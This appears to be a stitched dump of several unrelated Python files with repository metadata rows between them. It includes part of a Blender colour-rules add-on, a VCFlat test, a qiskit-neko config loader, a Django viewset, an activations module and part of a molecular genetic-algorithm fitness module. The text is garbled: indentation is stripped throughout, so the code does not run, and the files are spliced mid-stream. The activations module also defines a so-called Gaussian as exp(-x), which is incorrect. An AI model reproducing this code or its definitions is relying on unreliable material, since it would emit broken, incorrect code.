def MATERIAL(obj, rule, cache):
match_name = rule.match_name
materials = getattr(obj.data, "materials", None)
return ((materials is not None) and
(any((test_name(rule, match_name, m.name) for m in materials if m is not None))))
@staticmethod
def LAYER(obj, rule, cache):
match_layers = rule.match_layers[:]
obj_layers = obj.layers[:]
return any((match_layers[i] and obj_layers[i]) for i in range(20))
@staticmethod
def TYPE(obj, rule, cache):
return (obj.type == rule.match_object_type)
@staticmethod
def EXPR(obj, rule, cache):
if not cache:
match_expr = rule.match_expr
expr = compile(match_expr, rule.name, 'eval')
namespace = {}
namespace.update(__import__("math").__dict__)
cache["expr"] = expr
cache["namespace"] = namespace
else:
expr = cache["expr"]
namespace = cache["namespace"]
try:
return bool(eval(expr, {}, {"self": obj}))
except:
import traceback
traceback.print_exc()
return False
class rule_draw:
__slots__ = ()
def __new__(cls, *args, **kwargs):
raise RuntimeError("%s should not be instantiated" % cls)
@staticmethod
def _generic_match_name(layout, rule):
layout.label(text="Match Name:")
row = layout.row(align=True)
row.prop(rule, "match_name", text="")
row.prop(rule, "use_match_regex", text="", icon='SORTALPHA')
@staticmethod
def NAME(layout, rule):
rule_draw._generic_match_name(layout, rule)
@staticmethod
def DATA(layout, rule):
rule_draw._generic_match_name(layout, rule)
@staticmethod
def GROUP(layout, rule):
rule_draw._generic_match_name(layout, rule)
@staticmethod
def MATERIAL(layout, rule):
rule_draw._generic_match_name(layout, rule)
@staticmethod
def TYPE(layout, rule):
row = layout.row()
row.prop(rule, "match_object_type")
@staticmethod
def LAYER(layout, rule):
row = layout.row()
row.prop(rule, "match_layers")
@staticmethod
def EXPR(layout, rule):
col = layout.column()
col.label(text="Scripted Expression:")
col.prop(rule, "match_expr", text="")
def object_colors_calc(rules, objects):
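    # Blend the colors of all matching rules into each object's color; objects with at least one match get show_wire_color enabled.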
from mathutils import Color
rules_cb = [getattr(rule_test, rule.type) for rule in rules]
rules_blend = [(1.0 - rule.factor, rule.factor) for rule in rules]
rules_color = [Color(rule.color) for rule in rules]
rules_cache = [{} for i in range(len(rules))]
rules_inv = [rule.use_invert for rule in rules]
for obj in objects:
is_set = False
obj_color = Color(obj.color[0:3])
for (rule, test_cb, color, blend, cache, use_invert) \
in zip(rules, rules_cb, rules_color, rules_blend, rules_cache, rules_inv):
if test_cb(obj, rule, cache) is not use_invert:
if is_set is False:
obj_color = color
else:
                    # prevent mixing colors losing saturation
obj_color_s = obj_color.s
obj_color = (obj_color * blend[0]) + (color * blend[1])
obj_color.s = (obj_color_s * blend[0]) + (color.s * blend[1])
is_set = True
if is_set:
obj.show_wire_color = True
obj.color[0:3] = obj_color
def object_colors_select(rule, objects):
cache = {}
rule_type = rule.type
test_cb = getattr(rule_test, rule_type)
for obj in objects:
obj.select = test_cb(obj, rule, cache)
def object_colors_rule_validate(rule, report):
rule_type = rule.type
if rule_type in {'NAME', 'DATA', 'GROUP', 'MATERIAL'}:
if rule.use_match_regex:
import re
try:
re.compile(rule.match_name)
except Exception as e:
report({'ERROR'}, "Rule %r: %s" % (rule.name, str(e)))
return False
elif rule_type == 'EXPR':
try:
compile(rule.match_expr, rule.name, 'eval')
except Exception as e:
report({'ERROR'}, "Rule %r: %s" % (rule.name, str(e)))
return False
return True
import bpy
from bpy.types import (
Operator,
Panel,
UIList,
)
from bpy.props import (
StringProperty,
BoolProperty,
IntProperty,
FloatProperty,
EnumProperty,
CollectionProperty,
BoolVectorProperty,
FloatVectorProperty,
)
class OBJECT_PT_color_rules(Panel):
bl_label = "Color Rules"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "object"
def draw(self, context):
layout = self.layout
scene = context.scene
# Rig type list
row = layout.row()
row.template_list(
"OBJECT_UL_color_rule", "color_rules",
scene, "color_rules",
scene, "color_rules_active_index")
col = row.column()
colsub = col.column(align=True)
colsub.operator("object.color_rules_add", icon='ADD', text="")
colsub.operator("object.color_rules_remove", icon='REMOVE', text="")
colsub = col.column(align=True)
colsub.operator("object.color_rules_move", text="", icon='TRIA_UP').direction = -1
colsub.operator("object.color_rules_move", text="", icon='TRIA_DOWN').direction = 1
colsub = col.column(align=True)
colsub.operator("object.color_rules_select", text="", icon='RESTRICT_SELECT_OFF')
if scene.color_rules:
index = scene.color_rules_active_index
rule = scene.color_rules[index]
box = layout.box()
row = box.row(align=True)
row.prop(rule, "name", text="")
row.prop(rule, "type", text="")
row.prop(rule, "use_invert", text="", icon='ARROW_LEFTRIGHT')
draw_cb = getattr(rule_draw, rule.type)
draw_cb(box, rule)
row = layout.split(0.75, align=True)
props = row.operator("object.color_rules_assign", text="Assign Selected")
props.use_selection = True
props = row.operator("object.color_rules_assign", text="All")
props.use_selection = False
class OBJECT_UL_color_rule(UIList):
def draw_item(self, context, layout, data, rule, icon, active_data, active_propname, index):
# assert(isinstance(rule, bpy.types.ShapeKey))
# scene = active_data
split = layout.split(0.5)
row = split.split(align=False)
row.label(text="%s (%s)" % (rule.name, rule.type.lower()))
split = split.split(0.7)
split.prop(rule, "factor", text="", emboss=False)
split.prop(rule, "color", text="")
class OBJECT_OT_color_rules_assign(Operator):
"""Assign colors to objects based on user rules"""
bl_idname = "object.color_rules_assign"
bl_label = "Assign Colors"
bl_options = {'UNDO'}
use_selection: BoolProperty(
name="Selected",
description="Apply to selected (otherwise all objects in the scene)",
default=True,
)
def execute(self, context):
scene = context.scene
if self.use_selection:
objects = context.selected_editable_objects
else:
objects = scene.objects
rules = scene.color_rules[:]
for rule in rules:
if not object_colors_rule_validate(rule, self.report):
return {'CANCELLED'}
object_colors_calc(rules, objects)
return {'FINISHED'}
class OBJECT_OT_color_rules_select(Operator):
"""Select objects matching the current rule"""
bl_idname = "object.color_rules_select"
bl_label = "Select Rule"
bl_options = {'UNDO'}
def execute(self, context):
scene = context.scene
rule = scene.color_rules[scene.color_rules_active_index]
if not object_colors_rule_validate(rule, self.report):
return {'CANCELLED'}
objects = context.visible_objects
object_colors_select(rule, objects)
return {'FINISHED'}
class OBJECT_OT_color_rules_add(Operator):
bl_idname = "object.color_rules_add"
bl_label = "Add Color Layer"
bl_options = {'UNDO'}
def execute(self, context):
scene = context.scene
rules = scene.color_rules
rule = rules.add()
rule.name = "Rule.%.3d" % len(rules)
scene.color_rules_active_index = len(rules) - 1
return {'FINISHED'}
class OBJECT_OT_color_rules_remove(Operator):
bl_idname = "object.color_rules_remove"
bl_label = "Remove Color Layer"
bl_options = {'UNDO'}
def execute(self, context):
scene = context.scene
rules = scene.color_rules
rules.remove(scene.color_rules_active_index)
if scene.color_rules_active_index > len(rules) - 1:
scene.color_rules_active_index = len(rules) - 1
return {'FINISHED'}
class OBJECT_OT_color_rules_move(Operator):
bl_idname = "object.color_rules_move"
    bl_label = "Move Color Layer"
bl_options = {'UNDO'}
direction: IntProperty()
def execute(self, context):
scene = context.scene
rules = scene.color_rules
index = scene.color_rules_active_index
index_new = index + self.direction
if index_new < len(rules) and index_new >= 0:
rules.move(index, index_new)
scene.color_rules_active_index = index_new
return {'FINISHED'}
else:
return {'CANCELLED'}
class ColorRule(bpy.types.PropertyGroup):
name: StringProperty(
name="Rule Name",
)
color: FloatVectorProperty(
name="Color",
description="Color to assign",
subtype='COLOR', size=3, min=0, max=1, precision=3, step=0.1,
default=(0.5, 0.5, 0.5),
)
factor: FloatProperty(
name="Opacity",
description="Color to assign",
min=0, max=1, precision=1, step=0.1,
default=1.0,
)
type: EnumProperty(
name="Rule Type",
items=(('NAME', "Name", ""),
('DATA', "Data Name", "Name of the object data"),
('GROUP', "Group Name", "Object in group"),
('MATERIAL', "Material Name", "Object uses material"),
('TYPE', "Type", "Object type"),
('LAYER', "Layer", "Object in layer"),
('EXPR', "Expression", "Scripted expression"),
),
)
use_invert: BoolProperty(
name="Invert",
description="Match when the rule isn't met",
)
# ------------------
# Matching Variables
# shared by all name matching
match_name: StringProperty(
name="Match Name",
)
use_match_regex: BoolProperty(
name="Regex",
description="Use regular expressions for pattern matching",
)
# type == 'LAYER'
    match_layers: BoolVectorProperty(
name="Layers",
size=20,
subtype='LAYER',
)
# type == 'TYPE'
match_object_type: EnumProperty(
name="Object Type",
items=([(i.identifier, i.name, "")
for i in bpy.types.Object.bl_rna.properties['type'].enum_items]
)
)
# type == 'EXPR'
match_expr: StringProperty(
name="Expression",
description="Python expression, where 'self' is the object variable"
)
classes = (
OBJECT_PT_color_rules,
OBJECT_OT_color_rules_add,
OBJECT_OT_color_rules_remove,
OBJECT_OT_color_rules_move,
OBJECT_OT_color_rules_assign,
OBJECT_OT_color_rules_select,
OBJECT_UL_color_rule,
ColorRule,
)
def register():
for cls in classes:
bpy.utils.register_class(cls)
bpy.types.Scene.color_rules = CollectionProperty(type=ColorRule)
bpy.types.Scene.color_rules_active_index = IntProperty()
def unregister():
for cls in classes:
bpy.utils.unregister_class(cls)
del bpy.types.Scene.color_rules
| 30.506173 | 113 | 0.596857 |
114779832f44d374eeab22357254999500380424 | 751 | py | Python | vcflat/tests/test_VcfParse/test_sanitize_keys.py | arontommi/VCFlat | f707d8e564ec30c65e063eea305aa30cf698cc86 | [
"MIT"
] | 4 | 2019-11-29T12:59:12.000Z | 2020-01-28T15:30:44.000Z | vcflat/tests/test_VcfParse/test_sanitize_keys.py | arontommi/VCFlat | f707d8e564ec30c65e063eea305aa30cf698cc86 | [
"MIT"
] | 1 | 2022-01-04T22:58:58.000Z | 2022-01-04T22:58:58.000Z | vcflat/tests/test_VcfParse/test_sanitize_keys.py | arontommi/VCFlat | f707d8e564ec30c65e063eea305aa30cf698cc86 | [
"MIT"
] | 1 | 2020-01-28T15:31:29.000Z | 2020-01-28T15:31:29.000Z | import vcflat.VcfParse as VP
import os
import pytest
def get_input():
test_data_dir = os.path.join(os.path.dirname(__file__), "..", "test_data")
i = os.path.join(test_data_dir, "test.snpeff.vcf")
vcffile = VP.VcfParse(i)
return vcffile
def test_1():
    """ Check if the keys are found in the header of the VCF and reported correctly back"""
vcffile = get_input()
keys = "#CHROM POS"
sanitized_keys = vcffile.sanitize_keys(keys)
assert sanitized_keys == ["#CHROM", "POS"]
def test_2(capsys):
    """ Assert that an error is reported when a key is not found"""
vcffile = get_input()
keys = "#CHROM POS Wrong_key"
vcffile.sanitize_keys(keys)
out, err = capsys.readouterr()
print(err)
assert "No" in err.split()
| 25.033333 | 89 | 0.660453 |
0d59e8cb16bef418e866500a570fda2c7d7e70db | 1,805 | py | Python | qiskit_neko/config.py | garrison/qiskit-neko | 50c6f0f6975425c7ff86417cedc094e984dc5d1c | [
"Apache-2.0"
] | 5 | 2022-01-11T16:07:48.000Z | 2022-02-01T22:05:34.000Z | qiskit_neko/config.py | garrison/qiskit-neko | 50c6f0f6975425c7ff86417cedc094e984dc5d1c | [
"Apache-2.0"
] | 1 | 2022-02-03T14:10:57.000Z | 2022-02-03T14:10:57.000Z | qiskit_neko/config.py | garrison/qiskit-neko | 50c6f0f6975425c7ff86417cedc094e984dc5d1c | [
"Apache-2.0"
] | 1 | 2022-03-07T15:06:21.000Z | 2022-03-07T15:06:21.000Z | # This code is part of Qiskit.
#
# (C) Copyright IBM 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Configuration file"""
import logging
import voluptuous as vol
import yaml
LOG = logging.getLogger(__name__)
LOG_LEVEL_VALIDATOR = vol.Any("DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL")
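# Voluptuous schema describing the keys accepted in a Neko configuration file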
schema = vol.Schema(
{
vol.Optional("test_timeout"): vol.Coerce(float),
vol.Optional("backend_plugin", default="aer"): str,
vol.Optional("backend_selection"): str,
vol.Optional("backend_script"): str,
vol.Optional("default_log_level", default="INFO"): LOG_LEVEL_VALIDATOR,
vol.Optional("module_log_level"): {vol.Extra: LOG_LEVEL_VALIDATOR},
vol.Optional("log_format"): str,
vol.Optional("log_file"): str,
}
)
class NekoConfig:
"""The configuration class for Qiskit Neko."""
def __init__(self, filename=None):
"""Initialize a new configuration object.
:param str filename: The absolute path to the configuration file to
use for this configuration object
"""
self.filename = filename
self.config = None
if self.filename:
self.load_config()
def load_config(self):
"""Load the specified configuration file."""
with open(self.filename, "r", encoding="utf8") as fd:
raw_config = yaml.safe_load(fd.read())
self.config = schema(raw_config)
| 30.083333 | 79 | 0.67036 |
5d922ad9daeac39137413c21c3b00753eec6307d | 410 | py | Python | viewsets/change_serializer.py | R-Mielamud/Nicolaus | 05a28a19ca0127cf39b1238dc313cecd6e528c40 | [
"MIT"
] | null | null | null | viewsets/change_serializer.py | R-Mielamud/Nicolaus | 05a28a19ca0127cf39b1238dc313cecd6e528c40 | [
"MIT"
] | null | null | null | viewsets/change_serializer.py | R-Mielamud/Nicolaus | 05a28a19ca0127cf39b1238dc313cecd6e528c40 | [
"MIT"
] | 1 | 2021-03-09T16:06:23.000Z | 2021-03-09T16:06:23.000Z | from rest_framework.viewsets import ModelViewSet
class ChangeSerializerViewSet(ModelViewSet):
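    """Serve read_serializer_class for list/retrieve actions, falling back to
    write_serializer_class for every other action or when an admin-enabled
    viewset receives ?admin=1 in the query string."""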
for_admin = False
def get_serializer_class(self):
if ((self.action == "list" or self.action == "retrieve") and
not (self.for_admin and self.request.GET.get("admin") == "1")):
return self.read_serializer_class
else:
return self.write_serializer_class
| 34.166667 | 79 | 0.665854 |
bbfdacdd057c71de652ec8de11e9d5e1e00c3cd6 | 322 | py | Python | activations.py | rpams/Neural_network | 6ef3227fb5fc69bcec8aa462e0f3d6ba17a8babf | [
"MIT"
] | 1 | 2020-06-15T14:09:48.000Z | 2020-06-15T14:09:48.000Z | activations.py | rpams/Neural_network | 6ef3227fb5fc69bcec8aa462e0f3d6ba17a8babf | [
"MIT"
] | null | null | null | activations.py | rpams/Neural_network | 6ef3227fb5fc69bcec8aa462e0f3d6ba17a8babf | [
"MIT"
] | null | null | null | import numpy as np
# activation functions and their derivative
def tanh(x):
return np.tanh(x)
def tanh_prime(x):
return 1 - np.tanh(x) ** 2
def sigmoid(x):
    return 1 / (1 + np.exp(-x))
def sigmoid_prime(x):
    s = 1 / (1 + np.exp(-x))
    return s * (1 - s)
def gauss(x):
return np.exp(-x)
def gauss_prime(x):
return -np.exp(-x) | 15.333333 | 43 | 0.624224 |
fee58240bada87e6d34af5a1cb6572a7a5b8f125 | 26,358 | py | Python | generation_props.py | schithranandanurix/GA | f4eb388116c45bbe178835f9da0d899199b1105c | [
"Apache-1.1"
] | null | null | null | generation_props.py | schithranandanurix/GA | f4eb388116c45bbe178835f9da0d899199b1105c | [
"Apache-1.1"
] | null | null | null | generation_props.py | schithranandanurix/GA | f4eb388116c45bbe178835f9da0d899199b1105c | [
"Apache-1.1"
] | null | null | null | '''
Functions that are used while a Generation is being Evaluated
'''
import os
import multiprocessing
from rdkit import Chem
import numpy as np
from random import randrange
import discriminator as D
import evolution_functions as evo
from SAS_calculator.sascorer import calculateScore
manager = multiprocessing.Manager()
lock = multiprocessing.Lock()
def calc_prop_logP(unseen_smile_ls, property_name, props_collect):
'''Calculate logP for each molecule in unseen_smile_ls, and record results
in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = evo.get_logP(mol) # Add calculation
else:
            raise Exception('Invalid smile encountered while attempting to calculate logP')
def calc_prop_SAS(unseen_smile_ls, property_name, props_collect):
    '''Calculate synthetic accessibility score for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smile in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smile)
if did_convert: # ensure valid smile
props_collect[property_name][smile] = calculateScore(mol)
else:
            raise Exception('Invalid smile encountered while attempting to calculate SAS')
def calc_prop_RingP(unseen_smile_ls, property_name, props_collect):
'''Calculate Ring penalty for each molecule in unseen_smile_ls,
results are recorded in locked dictionary props_collect
'''
for smi in unseen_smile_ls:
mol, smi_canon, did_convert = evo.sanitize_smiles(smi)
if did_convert:
cycle_list = mol.GetRingInfo().AtomRings()
if len(cycle_list) == 0:
cycle_length = 0
else:
cycle_length = max([ len(j) for j in cycle_list ])
if cycle_length <= 6:
cycle_length = 0
else:
cycle_length = cycle_length - 6
props_collect[property_name][smi] = cycle_length
else:
            raise Exception('Invalid smile encountered while attempting to calculate Ring penalty')
def create_parr_process(chunks, property_name):
''' Create parallel processes for calculation of properties
'''
# Assign data to each process
process_collector = []
collect_dictionaries = []
for item in chunks:
props_collect = manager.dict(lock=True)
smiles_map_ = manager.dict(lock=True)
props_collect[property_name] = smiles_map_
collect_dictionaries.append(props_collect)
if property_name == 'logP':
process_collector.append(multiprocessing.Process(target=calc_prop_logP, args=(item, property_name, props_collect, )))
if property_name == 'SAS':
process_collector.append(multiprocessing.Process(target=calc_prop_SAS, args=(item, property_name, props_collect, )))
if property_name == 'RingP':
process_collector.append(multiprocessing.Process(target=calc_prop_RingP, args=(item, property_name, props_collect, )))
for item in process_collector:
item.start()
for item in process_collector: # wait for all parallel processes to finish
item.join()
combined_dict = {} # collect results from multiple processess
for i,item in enumerate(collect_dictionaries):
combined_dict.update(item[property_name])
return combined_dict
def fitness(molecules_here, properties_calc_ls,
discriminator, disc_enc_type, generation_index,
max_molecules_len, device, num_processors, writer, beta,
data_dir, max_fitness_collector, impose_time_adapted_pen):
    ''' Calculate fitness for a generation in the GA
All properties are standardized based on the mean & stddev of the zinc dataset
Parameters:
molecules_here (list) : List of a string of molecules
    properties_calc_ls : Type of property to be shown to the discriminator
discriminator (torch.Model) : Pytorch classifier
disc_enc_type (string) : Indicated type of encoding shown to discriminator
generation_index (int) : Which generation indicator
max_molecules_len (int) : Largest mol length
    device (string) : Device of discriminator
num_processors (int) : Number of cpu processors to parallelize over
writer (tensorboardX writer obj) : Tensorboard graphing tool
beta (int) : Discriminator fitness parameter
data_dir (str) : Directory for saving data
max_fitness_collector (list) : List for collecting max fitness values
impose_time_adapted_pen (bool) : Impose time-adaptive discriminator penalty?
Returns:
    fitness (np.array) : A linear combination of properties and
discriminator predictions
    discriminator_predictions (np.array) : The predictions made by the discriminator
'''
dataset_x = evo.obtain_discr_encoding(molecules_here, disc_enc_type, max_molecules_len, num_processors, generation_index)
if generation_index == 1:
discriminator_predictions = np.zeros((len(dataset_x),1))
else:
discriminator_predictions = D.do_predictions(discriminator, dataset_x, device)
if properties_calc_ls == None:
fitness = discriminator_predictions
else:
molecules_here_unique = list(set(molecules_here))
ratio = len(molecules_here_unique) / num_processors
chunks = evo.get_chunks(molecules_here_unique, num_processors, ratio)
chunks = [item for item in chunks if len(item) >= 1]
logP_results, SAS_results, ringP_results, QED_results = {}, {}, {}, {}
# Parallelize the calculation of logPs
if 'logP' in properties_calc_ls:
logP_results = create_parr_process(chunks, 'logP')
# Parallelize the calculation of SAS
if 'SAS' in properties_calc_ls:
SAS_results = create_parr_process(chunks, 'SAS')
        # Parallelize the calculation of Ring Penalty
if 'RingP' in properties_calc_ls:
ringP_results = create_parr_process(chunks, 'RingP')
if 'QED' in properties_calc_ls:
QED_results = {}
for smi in molecules_here:
QED_results[smi] = Chem.QED.qed(Chem.MolFromSmiles(smi))
logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, QED_results = obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, QED_results, properties_calc_ls)
# Add SAS and Ring Penalty
# Note: The fitness function must include the properties of var. 'properties_calc_ls'
fitness = (logP_norm) - (SAS_norm) # - (RingP_norm) i comment out ringp as i don't want to constrain ring size (based on discussions with angelica)
# Plot fitness without discriminator
writer.add_scalar('max fitness without discr', max(fitness), generation_index)
writer.add_scalar('avg fitness without discr', fitness.mean(), generation_index)
max_fitness_collector.append(max(fitness)[0])
        ## Impose the beta cutoff! --------------------------
if impose_time_adapted_pen:
if generation_index > 100:
                if len(set(max_fitness_collector[-5:])) == 1: # Check if there is stagnation for 5 generations!
beta = 1000
print('Beta cutoff imposed index: ', generation_index)
f = open('{}/beta_change_log.txt'.format(data_dir), 'a+')
f.write(str(generation_index) + '\n')
f.close()
        ## beta cutoff imposed! --------------------------
# max fitness without discriminator
f = open('{}/max_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness without discriminator
f = open('{}/avg_fitness_no_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
print('beta value: ', beta)
fitness = (beta * discriminator_predictions) + fitness
# Plot fitness with discriminator
writer.add_scalar('max fitness with discrm', max(fitness), generation_index)
writer.add_scalar('avg fitness with discrm', fitness.mean(), generation_index)
# max fitness with discriminator
f = open('{}/max_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(max(fitness)[0]) + '\n')
f.close()
# avg fitness with discriminator
f = open('{}/avg_fitness_discr.txt'.format(data_dir), 'a+')
f.write(str(fitness.mean()) + '\n')
f.close()
# Plot properties
writer.add_scalar('non standr max logp', max(logP_calculated), generation_index) # logP plots
writer.add_scalar('non standr mean logp', logP_calculated.mean(), generation_index)
writer.add_scalar('non standr min sas', min(SAS_calculated), generation_index) # SAS plots
writer.add_scalar('non standr mean sas', SAS_calculated.mean(), generation_index)
writer.add_scalar('non standr min ringp', min(RingP_calculated), generation_index) # RingP plots
writer.add_scalar('non standr mean ringp', RingP_calculated.mean(), generation_index)
# max logP - non standardized
f = open('{}/max_logp.txt'.format(data_dir), 'a+')
f.write(str(max(logP_calculated)) + '\n')
f.close()
# mean logP - non standardized
f = open('{}/avg_logp.txt'.format(data_dir), 'a+')
f.write(str(logP_calculated.mean()) + '\n')
f.close()
# min SAS - non standardized
f = open('{}/min_SAS.txt'.format(data_dir), 'a+')
f.write(str(min(SAS_calculated)) + '\n')
f.close()
# mean SAS - non standardized
f = open('{}/avg_SAS.txt'.format(data_dir), 'a+')
f.write(str(SAS_calculated.mean()) + '\n')
f.close()
# min RingP - non standardized
f = open('{}/min_RingP.txt'.format(data_dir), 'a+')
f.write(str(min(RingP_calculated)) + '\n')
f.close()
# mean RingP - non standardized
f = open('{}/avg_RingP.txt'.format(data_dir), 'a+')
f.write(str(RingP_calculated.mean()) + '\n')
f.close()
return fitness, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions
def obtained_standardized_properties(molecules_here, logP_results, SAS_results, ringP_results, QED_results, properties_calc_ls):
''' Obtain calculated properties of molecules in molecules_here, and standardize
the values based on properties of the ZINC data set.
'''
logP_calculated = []
SAS_calculated = []
RingP_calculated = []
QED_calculated = []
for smi in molecules_here:
if 'logP' in properties_calc_ls:
logP_calculated.append(logP_results[smi])
if 'SAS' in properties_calc_ls:
SAS_calculated.append(SAS_results[smi])
if 'RingP' in properties_calc_ls:
RingP_calculated.append(ringP_results[smi])
if 'QED' in properties_calc_ls:
QED_calculated.append(QED_results[smi])
logP_calculated = np.array(logP_calculated)
SAS_calculated = np.array(SAS_calculated)
RingP_calculated = np.array(RingP_calculated)
QED_calculated = np.array(QED_calculated)
# Standardize logP based on zinc logP (mean: 2.4729421499641497 & std : 1.4157879815362406)
logP_norm = (logP_calculated - 2.4729421499641497) / 1.4157879815362406
logP_norm = logP_norm.reshape((logP_calculated.shape[0], 1))
# Standardize SAS based on zinc SAS(mean: 3.0470797085649894 & std: 0.830643172314514)
SAS_norm = (SAS_calculated - 3.0470797085649894) / 0.830643172314514
SAS_norm = SAS_norm.reshape((SAS_calculated.shape[0], 1))
# Standardize RingP based on zinc RingP (mean: 0.038131530820234766 & std: 0.2240274735210179)
RingP_norm = (RingP_calculated - 0.038131530820234766) / 0.2240274735210179
RingP_norm = RingP_norm.reshape((RingP_calculated.shape[0], 1))
return logP_calculated, SAS_calculated, RingP_calculated, logP_norm, SAS_norm, RingP_norm, QED_calculated
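# Illustrative sketch (hypothetical helper, not used by the GA loop): the
# standardization above is a plain z-score against precomputed ZINC statistics,
# e.g. a raw logP of 3.9 maps to (3.9 - 2.4729...) / 1.4158... ~= 1.01, i.e.
# roughly one standard deviation above the ZINC mean. SAS and RingP follow the
# same pattern with their own mean/std pairs.
def _zinc_standardize_logP_example(raw_logP=3.9):
    '''Reproduces the logP z-score used in obtained_standardized_properties for one value.'''
    return (raw_logP - 2.4729421499641497) / 1.4157879815362406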
def obtain_fitness(disc_enc_type, smiles_here, selfies_here, properties_calc_ls,
discriminator, generation_index, max_molecules_len, device,
generation_size, num_processors, writer, beta, image_dir,
data_dir, max_fitness_collector, impose_time_adapted_pen):
''' Obtain fitness of generation based on choices of disc_enc_type.
Essentially just calls 'fitness'
'''
# ANALYSE THE GENERATION
if disc_enc_type == 'smiles' or disc_enc_type == 'properties_rdkit':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions = fitness(smiles_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, max_fitness_collector, impose_time_adapted_pen)
elif disc_enc_type == 'selfies':
fitness_here, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions = fitness(selfies_here, properties_calc_ls , discriminator,
disc_enc_type, generation_index, max_molecules_len, device, num_processors, writer, beta, data_dir, max_fitness_collector, impose_time_adapted_pen)
fitness_here = fitness_here.reshape((generation_size, ))
order, fitness_ordered, smiles_ordered, selfies_ordered = order_based_on_fitness(fitness_here, smiles_here, selfies_here)
# Order molecules based on ordering of 'smiles_ordered'
logP_calculated = [logP_calculated[idx] for idx in order]
SAS_calculated = [SAS_calculated[idx] for idx in order]
RingP_calculated = [RingP_calculated[idx] for idx in order]
discriminator_predictions = [discriminator_predictions[idx] for idx in order]
os.makedirs('{}/{}'.format(data_dir, generation_index))
# Write ordered smiles in a text file
f = open('{}/{}/smiles_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in smiles_ordered])
f.close()
# Write logP of ordered smiles in a text file
f = open('{}/{}/logP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in logP_calculated])
f.close()
# Write sas of ordered smiles in a text file
f = open('{}/{}/sas_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in SAS_calculated])
f.close()
# Write ringP of ordered smiles in a text file
f = open('{}/{}/ringP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in RingP_calculated])
f.close()
# Write discriminator predictions of ordered smiles in a text file
f = open('{}/{}/discrP_ordered.txt'.format(data_dir, generation_index), 'a+')
f.writelines(["%s\n" % item for item in discriminator_predictions])
f.close()
# Add the average & max discriminator score of a generation
writer.add_scalar('mean discriminator score', np.array(discriminator_predictions).mean(), generation_index)
writer.add_scalar('max discriminator score', max(discriminator_predictions), generation_index)
f = open('{}/avg_discr_score.txt'.format(data_dir), 'a+')
f.write(str(np.array(discriminator_predictions).mean()) + '\n')
f.close()
f = open('{}/max_discr_score.txt'.format(data_dir), 'a+')
f.write(str(max(discriminator_predictions)[0]) + '\n')
f.close()
#print statement for the best molecule in the generation
# print('Best best molecule in generation ', generation_index)
# print(' smile : ', smiles_ordered[0])
# print(' fitness: ', fitness_ordered[0])
# print(' logP : ', logP_calculated[0])
# print(' sas : ', SAS_calculated[0])
# print(' ringP : ', RingP_calculated[0])
# print(' discrm : ', discriminator_predictions[0])
f = open('{}/best_in_generations.txt'.format(data_dir), 'a+')
best_gen_str = 'index: {}, smile: {}, fitness: {}, logP: {}, sas: {}, ringP: {}, discrm: {}'.format(generation_index, smiles_ordered[0], fitness_ordered[0], logP_calculated[0], SAS_calculated[0], RingP_calculated[0], discriminator_predictions[0])
f.write(best_gen_str + '\n')
f.close()
show_generation_image(generation_index, image_dir, smiles_ordered, fitness_ordered, logP_calculated, SAS_calculated, RingP_calculated, discriminator_predictions)
return fitness_here, order, fitness_ordered, smiles_ordered, selfies_ordered
def show_generation_image(generation_index, image_dir, smiles_ordered, fitness, logP, SAS, RingCount, discr_scores):
''' Plot the 100 molecules with the best fitness in a generation.
Called at the end of each generation. The image for each generation
is stored with the name 'generation_index.png'
Images are stored in the directory './images'
'''
if generation_index > 1:
A = list(smiles_ordered)
A = A[:100]
if len(A) < 100 : return #raise Exception('Not enough molecules provided for plotting ', len(A))
A = [Chem.MolFromSmiles(x) for x in A]
evo.create_100_mol_image(A, "./{}/{}_ga.png".format(image_dir, generation_index), fitness, logP, SAS, RingCount, discr_scores)
def obtain_previous_gen_mol(starting_smiles, starting_selfies, generation_size,
generation_index, selfies_all, smiles_all):
'''Obtain molecules from one generation prior.
If generation_index is 1, only the starting molecules are returned
Parameters:
Returns:
'''
# Obtain molecules from the previous generation
if generation_index == 1:
randomized_smiles = []
randomized_selfies = []
for i in range(generation_size): # nothing to obtain from previous gen
# So, choose random molecules from the starting list
index = randrange(len(starting_smiles))
randomized_smiles.append(starting_smiles[index])
randomized_selfies.append(starting_selfies[index])
return randomized_smiles, randomized_selfies
else:
return smiles_all[generation_index-2], selfies_all[generation_index-2]
def order_based_on_fitness(fitness_here, smiles_here, selfies_here):
'''Order elements of the lists (args) based on decreasing fitness
'''
order = np.argsort(fitness_here)[::-1] # Decreasing order of indices, based on fitness
fitness_ordered = [fitness_here[idx] for idx in order]
smiles_ordered = [smiles_here[idx] for idx in order]
selfies_ordered = [selfies_here[idx] for idx in order]
return order, fitness_ordered, smiles_ordered, selfies_ordered
def apply_generation_cutoff(order, generation_size):
''' Return a list of indices of molecules that are kept (high fitness)
and a list of indices of molecules that are replaced (low fitness)
The cut-off is imposed using a Fermi-Function
Parameters:
order (list) : list of molecule indices arranged in Decreasing order of fitness
generation_size (int) : number of molecules in a generation
